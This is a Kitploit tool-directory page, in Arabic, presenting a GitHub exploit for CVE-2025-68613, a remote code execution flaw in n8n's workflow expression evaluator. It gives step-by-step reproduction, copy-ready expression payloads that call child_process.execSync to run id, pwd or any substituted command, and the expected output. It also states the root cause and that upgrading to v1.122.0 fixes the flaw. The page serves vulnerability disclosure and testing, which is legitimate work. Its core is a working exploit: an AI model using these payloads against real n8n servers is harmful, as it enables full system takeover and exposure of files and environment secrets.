Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: استغلال ثغرة RCE في n8n وتوثيقها | Kitploit
أدوات/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: استغلال ثغرة RCE في n8n وتوثيقها

عرض المستودع
106222منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

n8n - CVE-2025-68613: التحكم غير السليم في موارد الأكواد المُدارة ديناميكيًا

الثغرة

تحتوي n8n على ثغرة حرجة لتنفيذ الأكواد التعسفي (Arbitrary Code Execution) في نظام تقييم تعبيرات سير العمل. في ظل ظروف معينة، قد يتم تقييم التعبيرات التي يقدمها المستخدمون المُصادَق عليهم أثناء تكوين سير العمل في سياق تنفيذ غير معزول بما يكفي عن بيئة التشغيل الأساسية.

الإصدارات المتأثرة

  • الضعيفة: n8n < v1.122.0
  • المصححة: n8n >= v1.122.0

المتطلبات

  • وصول مُصادَق إلى مثيل n8n
  • القدرة على إنشاء/تعديل سير العمل

خطوات إعادة الإنتاج

1. إنشاء سير عمل جديد

  • انقر على "إضافة سير عمل"

2. إضافة العقد

  • أضف عقدة "Manual Trigger"
  • أضف عقدة "Set" (متصلة بالمشغل)

3. تكوين الحمولة

  • انقر على عقدة Set
  • انقر على "إضافة قيمة" → اختر "String"
  • سمِّ الحقل "result"
  • انقر على أيقونة "=" لتفعيل وضع التعبيرات

4. حقن الحمولة

الصق هذه الحمولة في حقل التعبير:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. التنفيذ

  • انقر على "تنفيذ الخطوة"
  • تحقق من مخرجات عقدة Set لرؤية نتيجة الأمر

عرض استغلال CVE-2025-68613

أمثلة على الحمولات

أمر ID:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

أمر PWD:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

قالب أمر مخصص:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

المخرجات المتوقعة

لأمر id:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

لأمر pwd:

root@kitploit:~
/app

السبب الجذري

يفتقر مُقيّم التعبيرات إلى مُنقٍّ (sanitizer) يمنع تعبيرات الدوال من الوصول إلى this.process (كائن العملية في Node.js)، مما يسمح بالوصول إلى وحدات النظام.

التأثير

  • تنفيذ أوامر تعسفي
  • الوصول إلى نظام الملفات
  • كشف متغيرات البيئة
  • اختراق كامل للنظام

التخفيف

قم بالترقية إلى n8n v1.122.0 أو أحدث.

المراجع

  • الإصلاح: https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • المستودع: https://github.com/n8n-io/n8n
  • مقال المدونة: https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

إخلاء مسؤولية: تُقدَّم هذه المعلومات لأغراض الاختبار في بيئات معزولة والتعليم فقط. الاستخدام غير المصرح به لهذه المعلومات لاستغلال الأنظمة غير قانوني وغير أخلاقي. احرص دائمًا على الحصول على إذن مناسب قبل اختبار الثغرات أو استغلالها.

تنزيل الأداة